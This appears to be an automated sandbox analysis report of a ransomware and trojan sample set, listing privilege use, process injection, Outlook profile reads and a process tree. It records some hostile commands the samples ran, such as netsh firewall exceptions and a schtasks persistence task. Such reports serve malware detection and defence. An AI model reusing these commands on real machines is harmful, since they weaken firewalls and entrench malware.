kill.exeHEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exedescription pid Process Token: SeRestorePrivilege 4592 7zFM.exe Token: 35 4592 7zFM.exe Token: SeSecurityPrivilege 4592 7zFM.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeDebugPrivilege 820 taskmgr.exe Token: SeSystemProfilePrivilege 820 taskmgr.exe Token: SeCreateGlobalPrivilege 820 taskmgr.exe Token: SeDebugPrivilege 4996 taskmgr.exe Token: SeSystemProfilePrivilege 4996 taskmgr.exe Token: SeCreateGlobalPrivilege 4996 taskmgr.exe Token: 33 820 taskmgr.exe Token: SeIncBasePriorityPrivilege 820 taskmgr.exe Token: SeDebugPrivilege 4944 HEUR-Trojan.MSIL.Crypt.gen-779da79cc7425f8b7264e175a58ad72e0a1ab0534840a438fc228c7baee809d1.exe Token: SeDebugPrivilege 2884 HEUR-Trojan.MSIL.Crypt.gen-49b033d90c561256dbe38618a71c2b61d3872c0e0029ab30fc3f5a509105770f.exe Token: SeDebugPrivilege 4940 HEUR-Trojan.MSIL.Crypt.gen-df0a37eacb80e772be78ec2a3e71546d18d68ba918b8ca859e8707da81b9bb02.exe Token: SeDebugPrivilege 552 HEUR-Trojan.MSIL.Crypt.gen-c11b258979d24a7c988d540cb3551c58a3addbbdb85c2307aee72eae8c5c3770.exe Token: SeDebugPrivilege 3664 HEUR-Trojan.MSIL.Crypt.gen-d87374e98b04a552b43671748cd846f1ecff5b1c31172f8e80a2acdc9bb13567.exe Token: SeDebugPrivilege 4204 HEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exe Token: SeDebugPrivilege 4564 HEUR-Trojan.MSIL.Crypt.gen-eb01cedd82b31373d4c5eb721248a97239efcc247c17823bb5493ed73423bcaf.exe Token: SeDebugPrivilege 432 MServices.exe Token: SeDebugPrivilege 3196 powershell.exe Token: SeDebugPrivilege 4776 Temp4qsldidhv1r.exe Token: SeDebugPrivilege 2020 HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe Token: SeDebugPrivilege 2020 HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe Token: SeDebugPrivilege 5196 HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe Token: SeDebugPrivilege 5568 powershell.exe Token: SeSecurityPrivilege 5996 Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe Token: SeSecurityPrivilege 5996 Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe Token: SeSecurityPrivilege 5996 Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe Token: SeDebugPrivilege 6024 Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe Token: 33 6024 Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe Token: SeIncBasePriorityPrivilege 6024 Trojan.MSIL.Crypt.hvhg-d7127ebc7b687755b514823dfaa010fbdb6fe9772cbc09b82173732d26facad2.exe Token: SeDebugPrivilege 4008 chromet.exe Token: SeDebugPrivilege 760 HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe Token: 33 760 HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe Token: SeIncBasePriorityPrivilege 760 HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe Token: SeDebugPrivilege 5212 Powershell.exe Token: SeDebugPrivilege 5064 Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe Token: SeDebugPrivilege 5960 Google.exe Token: 33 5960 Google.exe Token: SeIncBasePriorityPrivilege 5960 Google.exe Token: SeDebugPrivilege 5828 powershell.exe Token: 33 4008 chromet.exe Token: SeIncBasePriorityPrivilege 4008 chromet.exe Token: SeDebugPrivilege 3676 svchost32.exe Token: SeDebugPrivilege 5420 powershell.exe Token: 33 5960 Google.exe Token: SeIncBasePriorityPrivilege 5960 Google.exe Token: SeDebugPrivilege 2352 powershell.exe Token: 33 760 HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe Token: SeIncBasePriorityPrivilege 760 HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe Token: SeDebugPrivilege 636 DLL32.exe Token: SeDebugPrivilege 4924 powershell.exe Token: SeDebugPrivilege 5976 powershell.exe Token: SeDebugPrivilege 5712 powershell.exe Token: 33 4008 chromet.exe Token: SeIncBasePriorityPrivilege 4008 chromet.exe Token: 33 636 DLL32.exe Token: SeIncBasePriorityPrivilege 636 DLL32.exe Token: 33 760 HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe Token: SeIncBasePriorityPrivilege 760 HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe Token: SeDebugPrivilege 3408 HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe Token: SeDebugPrivilege 2056 taskkill.exe Token: SeDebugPrivilege 5632 HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
7zFM.exetaskmgr.exetaskmgr.exepid Process 4592 7zFM.exe 4592 7zFM.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exetaskmgr.exepid Process 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 820 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe 4996 taskmgr.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
OpenWith.execmd.exeTrojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exeWin.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.exeashcv.exeRegAsm.exepid Process 1528 OpenWith.exe 4588 cmd.exe 5996 Trojan.MSIL.Crypt.bvnw-042b7cf6c616a6534b9167902a0205e001ebda48019570da2566cd65a8a53097.exe 4588 cmd.exe 6004 Win.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.exe 6004 Win.Ransomware.Azvo-9979243-0-9597b79088c3cd0398338e4cdbcc3c1f07a9eab820ca6443a58877ccec4db0cb.exe 4588 cmd.exe 4588 cmd.exe 4588 cmd.exe 4588 cmd.exe 5124 ashcv.exe 5820 RegAsm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
powershell.exetaskmgr.execmd.exeHEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exeHEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exeHEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exedescription pid Process procid_target PID 4316 wrote to memory of 4588 4316 powershell.exe 97 PID 4316 wrote to memory of 4588 4316 powershell.exe 97 PID 820 wrote to memory of 4996 820 taskmgr.exe 100 PID 820 wrote to memory of 4996 820 taskmgr.exe 100 PID 4588 wrote to memory of 5012 4588 cmd.exe 102 PID 4588 wrote to memory of 5012 4588 cmd.exe 102 PID 4588 wrote to memory of 5012 4588 cmd.exe 102 PID 4588 wrote to memory of 3696 4588 cmd.exe 103 PID 4588 wrote to memory of 3696 4588 cmd.exe 103 PID 4588 wrote to memory of 3696 4588 cmd.exe 103 PID 4588 wrote to memory of 2276 4588 cmd.exe 104 PID 4588 wrote to memory of 2276 4588 cmd.exe 104 PID 4588 wrote to memory of 2276 4588 cmd.exe 104 PID 4588 wrote to memory of 2260 4588 cmd.exe 105 PID 4588 wrote to memory of 2260 4588 cmd.exe 105 PID 4588 wrote to memory of 3144 4588 cmd.exe 107 PID 4588 wrote to memory of 3144 4588 cmd.exe 107 PID 4588 wrote to memory of 3144 4588 cmd.exe 107 PID 3696 wrote to memory of 4852 3696 HEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe 109 PID 3696 wrote to memory of 4852 3696 HEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe 109 PID 3696 wrote to memory of 4852 3696 HEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe 109 PID 4588 wrote to memory of 452 4588 cmd.exe 110 PID 4588 wrote to memory of 452 4588 cmd.exe 110 PID 4588 wrote to memory of 452 4588 cmd.exe 110 PID 4588 wrote to memory of 3212 4588 cmd.exe 112 PID 4588 wrote to memory of 3212 4588 cmd.exe 112 PID 4588 wrote to memory of 3212 4588 cmd.exe 112 PID 3144 wrote to memory of 3532 3144 HEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe 111 PID 3144 wrote to memory of 3532 3144 HEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe 111 PID 3144 wrote to memory of 3532 3144 HEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe 111 PID 4588 wrote to memory of 2876 4588 cmd.exe 113 PID 4588 wrote to memory of 2876 4588 cmd.exe 113 PID 2276 wrote to memory of 1072 2276 HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe 114 PID 2276 wrote to memory of 1072 2276 HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe 114 PID 2276 wrote to memory of 1072 2276 HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe 114 PID 2276 wrote to memory of 1072 2276 HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe 114 PID 2276 wrote to memory of 1072 2276 HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe 114 PID 2276 wrote to memory of 1072 2276 HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe 114 PID 4588 wrote to memory of 760 4588 cmd.exe 115 PID 4588 wrote to memory of 760 4588 cmd.exe 115 PID 4588 wrote to memory of 760 4588 cmd.exe 115 PID 4588 wrote to memory of 2884 4588 cmd.exe 117 PID 4588 wrote to memory of 2884 4588 cmd.exe 117 PID 4588 wrote to memory of 4204 4588 cmd.exe 118 PID 4588 wrote to memory of 4204 4588 cmd.exe 118 PID 4588 wrote to memory of 4204 4588 cmd.exe 118 PID 4588 wrote to memory of 4944 4588 cmd.exe 119 PID 4588 wrote to memory of 4944 4588 cmd.exe 119 PID 4588 wrote to memory of 3408 4588 cmd.exe 120 PID 4588 wrote to memory of 3408 4588 cmd.exe 120 PID 4588 wrote to memory of 3408 4588 cmd.exe 120 PID 4588 wrote to memory of 3956 4588 cmd.exe 121 PID 4588 wrote to memory of 3956 4588 cmd.exe 121 PID 4588 wrote to memory of 532 4588 cmd.exe 122 PID 4588 wrote to memory of 532 4588 cmd.exe 122 PID 4588 wrote to memory of 532 4588 cmd.exe 122 PID 4588 wrote to memory of 552 4588 cmd.exe 206 PID 4588 wrote to memory of 552 4588 cmd.exe 206 PID 4588 wrote to memory of 4560 4588 cmd.exe 124 PID 4588 wrote to memory of 4560 4588 cmd.exe 124 PID 4588 wrote to memory of 4560 4588 cmd.exe 124 PID 4588 wrote to memory of 2020 4588 cmd.exe 125 PID 4588 wrote to memory of 2020 4588 cmd.exe 125 PID 4588 wrote to memory of 2020 4588 cmd.exe 125 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
-
outlook_office_path 1 IoCs
Processes:
RegAsm.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe -
outlook_win_path 1 IoCs
Processes:
RegAsm.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegAsm.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00462.7z1⤵
- Modifies registry class
PID:4296
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1528
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3916
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00462.7z"1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4592
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"2⤵
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4588 -
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Blocker.gen-7d1a6a371aed5661b7f62da5e040396dda8a17733174e25f6b211ffef5810245.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-7d1a6a371aed5661b7f62da5e040396dda8a17733174e25f6b211ffef5810245.exe3⤵
- Executes dropped EXE
PID:5012
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exeHEUR-Trojan-Ransom.Win32.Blocker.pef-ef519092e635c9662c0cfb2203d7554b0abc28a69ab2a38c53214186dbb0ec20.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3696 -
C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4852
-
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exeHEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exeHEUR-Trojan-Ransom.Win32.Convagent.gen-068e4d5470484400639e3a9200b7d2dd8d0feeb28479b508c10523dd42596b21.exe4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:1072
-
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exeHEUR-Trojan-Ransom.Win32.Crypmodadv.vho-bc5f7d3e6134e982f018095228acbf957be6b7fedcb1d219f7a76c38f9230939.exe3⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in Program Files directory
PID:2260
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exeHEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3144 -
C:\Users\Admin\AppData\Local\Temp\onefile_3144_133728903411204673\main.exeHEUR-Trojan-Ransom.Win32.Gen.gen-ac819f53c63609acde902bcdd41286925996b86cdd5777febf7fecdb1b4ecc14.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:3532
-
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exeHEUR-Trojan-Ransom.Win32.PolyRansom.gen-5156718dfda230aa1c3e23d8c623c2403d8ce78321ea0ac3f3debe745e5dbb2a.exe3⤵
- Modifies WinLogon for persistence
- Drops startup file
- Executes dropped EXE
- Enumerates connected drives
- Drops autorun.inf file
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:452
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exeHEUR-Trojan-Ransom.Win32.Stop.gen-70526e6e5bd07f7a0eb2dab278c107340fcd9f59505af54507528fd8032bc5df.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:3212
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-08c273af2b38f8c03028bc1e8f383d784712ff84b7b9c9e421ce1c9213d2e557.exeHEUR-Trojan.MSIL.Crypt.gen-08c273af2b38f8c03028bc1e8f383d784712ff84b7b9c9e421ce1c9213d2e557.exe3⤵
- Executes dropped EXE
PID:2876
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exeHEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:760 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe" "HEUR-Trojan.MSIL.Crypt.gen-0bbffda2c769cd4b7efa369c9f4415d5b15bb2f7b09e80f580df03df7e1fd0a8.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1988
-
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-49b033d90c561256dbe38618a71c2b61d3872c0e0029ab30fc3f5a509105770f.exeHEUR-Trojan.MSIL.Crypt.gen-49b033d90c561256dbe38618a71c2b61d3872c0e0029ab30fc3f5a509105770f.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2884
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exeHEUR-Trojan.MSIL.Crypt.gen-6cf6715578124129e279c73bcb6d9aaf380aaa71776b07deb242c65e069bb349.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4204 -
C:\Users\Admin\AppData\Local\Temp\MServices.exe"C:\Users\Admin\AppData\Local\Temp\MServices.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:432 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Regasm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:4100
-
-
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-779da79cc7425f8b7264e175a58ad72e0a1ab0534840a438fc228c7baee809d1.exeHEUR-Trojan.MSIL.Crypt.gen-779da79cc7425f8b7264e175a58ad72e0a1ab0534840a438fc228c7baee809d1.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4944
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exeHEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:3408 -
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe"{path}"4⤵PID:5728
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-7d9b443730943515c47bcc41cca4b4a50fa9cf0a4bdb122fe0ec904430f6cd0b.exe"{path}"4⤵
- Suspicious use of AdjustPrivilegeToken
PID:5632
-
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exeHEUR-Trojan.MSIL.Crypt.gen-81bd002cd9063ead258f20093a3ba8a0950dc2e6f2e9ab6417dd2e049cb1e7a2.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
PID:3956 -
C:\Windows\chromet.exe"C:\Windows\chromet.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops autorun.inf file
- Drops file in Windows directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4008 -
C:\Windows\SYSTEM32\netsh.exenetsh firewall add allowedprogram "C:\Windows\chromet.exe" "chromet.exe" ENABLE5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4432
-
-
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exeHEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:532 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FUyWXwXWrAlz" /XML "C:\Users\Admin\AppData\Local\Temp\tmp44EF.tmp"4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5288
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe"C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-bdb748650b1bca9455213265d9a09f9d7666d984cb1e293983e341bd7c7b9421.exe"4⤵
- System Location Discovery: System Language Discovery
PID:5708 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5708 -s 17925⤵
- Program crash
PID:3652
-
-
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c11b258979d24a7c988d540cb3551c58a3addbbdb85c2307aee72eae8c5c3770.exeHEUR-Trojan.MSIL.Crypt.gen-c11b258979d24a7c988d540cb3551c58a3addbbdb85c2307aee72eae8c5c3770.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:552
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exeHEUR-Trojan.MSIL.Crypt.gen-c88a94b57c6f59d709e3175c01d7e505df46a825e22f08f860257d48a58f38dd.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
PID:4560 -
C:\ProgramData\DLL32.exe"C:\ProgramData\DLL32.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:636
-
-
-
C:\Users\Admin\Desktop\00462\HEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exeHEUR-Trojan.MSIL.Crypt.gen-c9200832c84d4fd612cfbb208530aea3ce086aee1d21baea43277aafe97c1e51.exe3⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Suspicious use of SetThreadContext
